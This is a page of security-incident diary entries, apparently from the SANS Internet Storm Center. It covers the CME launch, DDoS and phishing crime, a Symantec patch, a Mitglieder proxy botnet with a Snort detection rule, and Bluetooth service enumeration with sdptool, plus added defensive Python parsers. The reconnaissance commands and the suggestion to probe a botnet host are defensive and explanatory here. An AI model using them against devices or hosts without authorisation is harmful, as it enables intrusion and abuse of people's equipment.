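A stock hosts file carries nothing but the localhost line, so on a workstation any extra entry deserves a look even if it is not on the watch list; the kind label just tells you whether to expect the fake site on the box itself or on a server somewhere else.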
Ah, if you are following my malware analysis quiz, I posted the results of the first one last Friday and have already put up the new one; answers should be sent no later than Oct 15. :) I hope that you are having as much fun as I am! :) I am already getting some really great answers!
Handler on Duty: Pedro Bueno - pbueno $$ ( isc. sans. org )
CME was officially launched
Today the US-CERT and MITRE released the CME, the Common Malware Enumeration, in a document called "Common Malware Enumeration Initiative Now Available". As it is supported by a board of anti-virus vendors, I believe that this initiative is really great and hope that it will be adopted by all the vendors as well, so we could also have more accurate numbers about virus variants.
This initiative seeks (according to the document) to:
- Reduce the public's confusion in referencing threats during malware incidents
- Enhance communication between anti-virus vendors
- Improve communication and information sharing between anti-virus vendors and the rest of the information security community
Handler on Duty: Pedro Bueno - pbueno $ ( isc . sans. org)
Big Business surrounding Internet Fraud
I highly recommend reading Spam Kings ( http://www.oreilly.com/catalog/spamkings/ ) on the specific topic of how the Spam business works. On the other hand, we have marginal businesses and organized crime participating in the electronic boom as well.
DDoS for Hire: These are the hired guns of the internet. They will offer to knock competitors off the internet for a sum of money. The most famous of these cases revolves around Jay Echouafni, who was the CEO of TV retailer Orbit Communications. He paid a group of underground computer criminals to DoS his competitors offline. The series of outages cost an estimated $2 million in damages. There is a great read on this at Security Focus ( http://www.securityfocus.com/news/9411 )
DDoS for Ransom: This is the online version of an extortion racket. I've seen this up close and personal when clients receive an email requesting that payment be made or they will be knocked off the internet. One of the most famous cases here was of an online casino based out of Costa Rica. When they were first contacted, the sum of money being requested seemed reasonable to the site owner. He paid it. Never, ever, ever, ever, ever... give in to these people. First he paid approximately $500 for protection. The following week, the request was a tad higher... $40K. The site owner requested help from the Costa Rican police, from the FBI and other law enforcement agencies. He did not receive the help (perhaps the feds did not like the idea of offshore gaming). He finally enlisted the help of a security consultant who analyzed the data and traced the attacks back to an RCM (Russian Cyber Mafia, for those in the know).
Phishing Phraud: No, don't worry, I'm not going to go on a long tirade of words with PHs. We are all familiar with this field of online crime. Jacomo Piccollini, from the Brazilian Research Network, gave a fantastic talk at a conference I recently attended. His topic was the Brazilian underground. One of the points he made was that Brazilian web defacement groups (of which Brazil happens to be world champion) were being hired by phishing groups to provide hosting of the phishing support sites on the defaced web servers. Some of the programmers working for the BCM (yes, Brazilian Cyber Mafia) were making $3K a month. The sad point here is that 4 of these programmers ended up dead last year, execution style.
The internet has reinvented business as we know it, both for good and evil. I would like to extend a big thank you to all the Internet Storm Center readers that submit information to us, and continue to battle evil one bit at a time.
Mike Poor mike at intelguardians d0t com
Handler on Duty
Symantec Antivirus Scan Engine: Web Service Administrative Interface Buffer Overflow
Patch today folks.
Symantec's Advisory (with patch and mitigation information) states the "Risk Impact" is High. Affected versions listed are:

| Product | Version | Build | Solution |
| --- | --- | --- | --- |
| Symantec AntiVirus Scan Engine | 4.0 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine | 4.3 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine for ISA | 4.0 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine for ISA | 4.3 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine for Netapp Filer | 4.0 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine for Messaging | 4.3 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine for Netapp NetCache | 4.0 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine for Network Attached Storage | 4.3 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine for Bluecoat | 4.0 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine for Caching | 4.3 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine for Microsoft SharePoint | 4.3 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine for Clearswift | 4.0 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine for Clearswift | 4.3 | All | SAVSE 4.3.12 |
| Symantec AntiVirus Scan Engine | 4.1 | All | |
I am currently a witness to the receiving end of a large scale brute force attack leveraged by a decently sized proxy botnet consisting of anywhere from 8k-12k nodes attacking at any time on any given day. I'm somewhat frustrated by the ongoing success of these botnet variants due to this particular variant's HTTP based phone home method to register the client IP and socks proxy listener port. Why oh why does it have to be so hard to kill these international web servers dead? The specific Mitglieder variant I have been looking at lately has at least 42 unique HTTP phone home destinations that are still DNS resolvable. The bots phone home with the following HTTP GET patterns, which result in the target HTTP server logging the client IP address including the socks proxy port number as a query string argument. Even though many of these servers are obviously virtual hosting environments that return 404 errors or other status codes, it is still possible that they are involved in this mess, since the HTTP server will still continue to gladly log the pertinent client IP and port number of infected nodes via error logging.
In the following list, the tpoint.ru host is currently THE WORST of them and possibly the primary node in masterminding the aggregation and distribution of the active botnet list to other top level proxy abusers to be used for bulk mailer and other abuse types that benefit from an additional hop of anonymous connectivity. This is absolutely organized big business. Within minutes of sending a fake connection to tpoint.ru you would see inbound socks proxy abuse. Try it, you'll see. Whether you like it is another matter altogether.
Here's a snort signature that can help identify not only Mitglieder proxy infections on your networks, but just about any other proxy bot variant when they are abused for bulkmailing purposes. Apologies for the snort signature line wrap. Yes, the rule should be one single line.
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "BLEEDING-EDGE Spambot Proxy Control Channel"; flow: established; content:"|04010019|"; offset: 0; depth: 4; classtype: trojan-activity; sid: 2001814; rev:4; )
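The four content bytes in that rule are not arbitrary: `04 01 00 19` is the start of a SOCKS4 request with VN=4, CD=1 (CONNECT) and DSTPORT=0x0019, i.e. TCP/25. The rule therefore fires on any client asking a proxy to open an SMTP connection on its behalf, which is exactly what a bulk mailer does through an abused bot. The following Python is an added example, not part of this diary entry or of the Bleeding Edge rule set: it decodes the SOCKS4 header so an analyst can see what the rule keys on, emulates the `offset: 0; depth: 4` match, and runs both over constructed test payloads (the addresses and user id are made up).

```python
"""Decode SOCKS4 request headers and emulate the Snort content match
content:"|04010019|"; offset: 0; depth: 4; (proxied CONNECT to TCP/25).

Added example; all payloads below are constructed test data.
"""
import struct

# The rule's content bytes: VN=0x04, CD=0x01 (CONNECT), DSTPORT=0x0019 (25).
SNORT_CONTENT = bytes.fromhex("04010019")

SOCKS4_COMMANDS = {1: "CONNECT", 2: "BIND"}


def snort_rule_matches(payload: bytes) -> bool:
    """offset 0 / depth 4: the content must occupy the first four bytes."""
    return payload[:4] == SNORT_CONTENT


def parse_socks4_request(payload: bytes):
    """Parse VN(1) CD(1) DSTPORT(2) DSTIP(4) USERID NUL [HOSTNAME NUL].

    Returns a dict, or None when the bytes are not a well-formed SOCKS4 request.
    """
    if len(payload) < 9 or payload[0] != 0x04:
        return None
    cmd, port = struct.unpack(">BH", payload[1:4])
    if cmd not in SOCKS4_COMMANDS:
        return None
    nul = payload.find(b"\x00", 8)
    if nul == -1:
        return None  # USERID must be NUL-terminated
    ip = ".".join(str(b) for b in payload[4:8])
    userid = payload[8:nul].decode("ascii", errors="replace")
    # SOCKS4a extension: DSTIP 0.0.0.x (x != 0) followed by a hostname.
    hostname = None
    if payload[4:7] == b"\x00\x00\x00" and payload[7] != 0:
        end = payload.find(b"\x00", nul + 1)
        if end != -1:
            hostname = payload[nul + 1:end].decode("ascii", errors="replace")
    return {"command": SOCKS4_COMMANDS[cmd], "dst_port": port,
            "dst_ip": ip, "userid": userid, "hostname": hostname}


def classify(payload: bytes) -> str:
    """Analyst view of one payload: what it is and whether the rule fires."""
    req = parse_socks4_request(payload)
    if req is None:
        return "not SOCKS4"
    target = req["hostname"] or req["dst_ip"]
    verdict = f"SOCKS4 {req['command']} -> {target}:{req['dst_port']}"
    if snort_rule_matches(payload):
        verdict += " [rule fires: proxied SMTP, likely spambot relay]"
    return verdict


def socks4_connect(ip: str, port: int, userid: bytes = b"") -> bytes:
    """Build a SOCKS4 CONNECT request (used only to construct test data)."""
    octets = bytes(int(o) for o in ip.split("."))
    return b"\x04\x01" + struct.pack(">H", port) + octets + userid + b"\x00"


# Constructed samples: proxied SMTP, proxied HTTP, a SOCKS5 greeting, plain HTTP.
SAMPLES = {
    "smtp_via_proxy": socks4_connect("198.51.100.10", 25, b"bot"),
    "http_via_proxy": socks4_connect("198.51.100.10", 80),
    "socks5_greeting": b"\x05\x01\x00",
    "plain_http": b"GET / HTTP/1.1\r\n",
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:16s} {classify(payload)}")
```

Only the first sample trips the rule; a CONNECT to port 80 through the same proxy does not, which is why the signature is a spambot indicator rather than a generic SOCKS detector. Because the match is pinned to offset 0 of the payload, it expects to see the client's first segment; run it on the `flow: established` side as the original rule does.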
After you've completed your own personal investigations, I myself recommend blocking access to the following host names from your networks.
Give 'em hell.
Handler on Duty (heh heh)
Future homepage for the above handler.
Arnold muscles in to put the smackdown on phishers.
I hope it's not long before Virginia has an equivalent law on the books. If not, I'll petition for it and ask that the default maximum amount be set to 1mil(USD). Hey, Why not?
All samples provided were of the 'Registry fix, You need our application' spam, and if you regularly look at traffic captures this will be nothing new. I am almost to the point where I treat UDP/1025-1030 as universal background noise.
Kaspersky Anti-Virus Products Remote Heap Overflow Vulnerability
"Tim ... is spending 1 to 2 weeks of his personal vacation time on assignment in our disaster operations warehouse in Austin, TX, performing configuration management and deployment of computer assets to shelters."
"Robert ... is spending one or more days of his personal time helping us to configure our new TippingPoint IPSs at national HQ."
"Chris ..., and project manager, Russ ..., configured and delivered 16 IBM donated Thinkpads to four chapter/disaster operations locations in Mobile, Pascagoula, Gulfport, and Hattiesburg on Friday and Saturday, Sept. 9-10. Those laptops are being used in shelter and client assistance operations."
"A week ago I mentioned two volunteers that were helping us out. Since then, we have engaged many more SANS volunteers. At this point I am not sure if I can even identify them all, since I shared our list of volunteers with so many people that needed technology help in our various Gulf coast service areas. But we know they're helping. As well as individuals, there are companies helping us out."
Folks, it goes without saying but Thanks Very Much for all that you are doing to assist in the recovery efforts! Please keep up the great work and the volunteer spirit!
Storm Center in the News
I used what I call my "combat laptop," or the "throwaway laptop." This is the one that I carry with me when I travel and go to conferences. It's had a lot of damage, but it still runs linuxes just fine. This particular incarnation is running Debian, and I used the BlueZ bluetooth stack/suite (http://www.bluez.org/).
The Bluetooth interface I used is a Belkin Bluetooth USB Adapter (F8T001).
Getting it up and running wasn't trivial; I found the following links to be helpful resources:
http://www.kevinboone.com/PF_p800_linux.html (specifically its references to bluezfw.)
Actually, nothing I tried could get it to work, until I moved the bluetooth dongle to another USB port. I'm not sure why that was required, but I'm not always the smartest little Mouseketeer.
While experimenting with other platforms, I found that Knoppix includes bluetooth USB support.
While googling on the topic, you will find lots of references to customized software used for the scanning (by references I mean that you see people mention it, but nobody coughs up a link). Since my initial goal was simple enumeration of devices and a quick assessment of how "juicy" a given target area is, I did not have need for actual bluetooth exploits. I found that the basic tools in the BlueZ tool suite were sufficient for my needs.
Starting simply with:
This will list the hardware ID numbers and a manufacturer's name of any device advertising in range. That "advertising" part is important. These would be the wardriving equivalent of wide open WAPs broadcasting.
If you are looking for particular services to exploit -- er, enumerate, you can simply scan for devices that support the feature of interest. For example, to find devices capable of setting up a dial-up internet connection, you would use:
sdptool search DUN
Other interesting services to search for are FTRN (for file transfer) and OPUSH.
A much more scientific way to go about this process is to use bp from the trifinite group (http://trifinite.org/) which I like because it relies on BlueZ's sdptool, and the Bluetooth Device Security Database (http://www.betaversion.net/btdsd/) all glued together with perl. Nice and simple and hackable.
Their process interrogates a bluetooth device using sdptool browse --tree XX:XX:XX:XX:XX:XX (which might be handy to have around later anyway.)
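Once you have a pile of `sdptool browse` output from an audit walk, the useful step is turning it into an inventory: which devices expose which service classes, on which RFCOMM channels, and which of those a policy review should look at. The script below is an added example, not part of this diary or of BlueZ or the trifinite tools. It parses the plain (non-`--tree`) record format that `sdptool browse` prints, with a constructed sample record set for a made-up address; the Bluetooth SIG 16-bit service class UUIDs it flags (0x1101, 0x1103, 0x1105, 0x1106, 0x1116) are the assigned numbers, and the review reasons attached to them are the author's own audit notes.

```python
"""Inventory Bluetooth service records from `sdptool browse` output.

Added example: the sample text below is constructed to mimic sdptool's plain
record format and does not come from a real device.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample of `sdptool browse 00:11:22:33:44:55` output (made-up device).
SAMPLE_BROWSE = """\
Browsing 00:11:22:33:44:55 ...
Service Name: Dial-up Networking
Service RecHandle: 0x10000
Service Class ID List:
  "Dialup Networking" (0x1103)
  "Generic Networking" (0x1201)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1
Profile Descriptor List:
  "Dialup Networking" (0x1103)
    Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10001
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100

Service Name: Headset Audio Gateway
Service RecHandle: 0x10002
Service Class ID List:
  "Headset Audio Gateway" (0x1112)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 2
"""

UUID_RE = re.compile(r'"([^"]+)"\s+\((0x[0-9A-Fa-f]{4})\)')

# Assigned 16-bit service class UUIDs worth a line in the audit report; the
# reason text is this example's own commentary, not a SIG definition.
REVIEW_UUIDS = {
    0x1101: "Serial Port: raw RFCOMM channel exposed to paired peers",
    0x1103: "Dial-up Networking: device usable as a modem (toll fraud, data path)",
    0x1105: "OBEX Object Push: accepts inbound files/vCards",
    0x1106: "OBEX File Transfer: remote browsing of the device's file store",
    0x1116: "PAN NAP: device bridges Bluetooth clients onto a network",
}


@dataclass
class ServiceRecord:
    name: str = ""
    handle: str = ""
    class_uuids: List[int] = field(default_factory=list)
    rfcomm_channel: Optional[int] = None


def parse_sdptool_browse(text: str) -> List[ServiceRecord]:
    """Split sdptool output into records; a record starts at 'Service Name:'."""
    records: List[ServiceRecord] = []
    current: Optional[ServiceRecord] = None
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Service Name:"):
            current = ServiceRecord(name=line.split(":", 1)[1].strip())
            records.append(current)
            section = None
        elif current is None:
            continue  # the "Browsing ..." banner before the first record
        elif line.startswith("Service RecHandle:"):
            current.handle = line.split(":", 1)[1].strip()
        elif line.endswith("List:"):
            section = line[:-1]  # "Service Class ID List", "Protocol Descriptor List", ...
        elif section == "Service Class ID List":
            m = UUID_RE.search(line)
            if m:
                current.class_uuids.append(int(m.group(2), 16))
        elif section == "Protocol Descriptor List" and line.startswith("Channel:"):
            current.rfcomm_channel = int(line.split(":", 1)[1])
    return records


def audit(address: str, records: List[ServiceRecord]) -> List[str]:
    """One finding per flagged service class, with the RFCOMM channel if known."""
    findings = []
    for rec in records:
        for uuid in rec.class_uuids:
            if uuid in REVIEW_UUIDS:
                chan = "" if rec.rfcomm_channel is None else f" on RFCOMM channel {rec.rfcomm_channel}"
                findings.append(f"{address} {rec.name!r} (0x{uuid:04X}){chan}: {REVIEW_UUIDS[uuid]}")
    return findings


if __name__ == "__main__":
    recs = parse_sdptool_browse(SAMPLE_BROWSE)
    print(f"{len(recs)} service records")
    for line in audit("00:11:22:33:44:55", recs):
        print(line)
```

Feed it the saved output of `sdptool browse` for each address your sensors see, and the audit list becomes the thing you hand to device owners: a headset profile is expected on a phone, an open dial-up or file transfer service on a laptop in the meeting room usually is not.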
Although the box advertised 100m ranges, a dongle plugged into the side of a laptop isn't in an ideal location for signal reception. Use of a USB extension cable is recommended. If you want to get really crazy, place the dongle at the focal point of a parabolic dish (I haven't tried that myself, but I've heard it works for 802.11 dongles). You could also hack an external antenna onto your bluetooth interface (http://trifinite.org/trifinite_stuff_bluetooone.html). I haven't tried this either. The orderlies don't like me around soldering irons and glue-guns.
Unlike wardriving, this is more of a sit-and-wait game. Bluetooth devices and users are mobile, so it's better to pick a proper high-traffic area (or better yet: the meeting room where you're holding your audit kick-off meeting). With enough sensors and proper placement, you can track the movement of your bluetooth users within your facility or campus. I'm sure nobody would do anything bad with that information. :-\
In other related neat-stuff-to-do
Check out http://cellspotting.com for something only peripherally related.
It is my first shift with the new system (be gentle); any errors in typography, grammar, or HTML syntax are purely my own.
kliston -at- isc sans org